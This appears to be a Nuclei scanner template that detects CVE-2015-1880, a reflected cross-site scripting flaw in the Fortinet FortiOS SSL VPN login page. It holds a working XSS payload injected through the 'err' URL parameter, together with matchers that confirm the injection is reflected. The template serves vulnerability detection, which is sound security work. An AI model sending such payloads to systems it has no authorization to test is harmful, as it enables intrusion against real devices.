50 lines
1.7 KiB
YAML
50 lines
1.7 KiB
YAML
id: CVE-2015-1880
|
|
|
|
info:
|
|
name: Fortinet FortiOS <=5.2.3 - Cross-Site Scripting
|
|
author: pikpikcu
|
|
severity: medium
|
|
description: Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
|
|
remediation: |
|
|
Upgrade Fortinet FortiOS to a version higher than 5.2.3 to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page
|
|
- http://www.fortiguard.com/advisory/FG-IR-15-005/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-1880
|
|
- http://www.securitytracker.com/id/1032261
|
|
- http://www.securitytracker.com/id/1032262
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
|
cvss-score: 4.3
|
|
cve-id: CVE-2015-1880
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00201
|
|
epss-percentile: 0.57919
|
|
cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: fortinet
|
|
product: fortios
|
|
tags: cve,cve2015,xss,fortigates,intrusive
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- <script>alert('{{randstr}}')</script>
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100b8aed46e0d7d1e1e27f0406a16056616e2d99fa029db84ddcffc10a05ad61d91022016dd250a2cc4fe404cc4eeae5d920e68bc16e77956e40d6b2fe656b11002f742:922c64590222798bb761d5b6d8e72950 |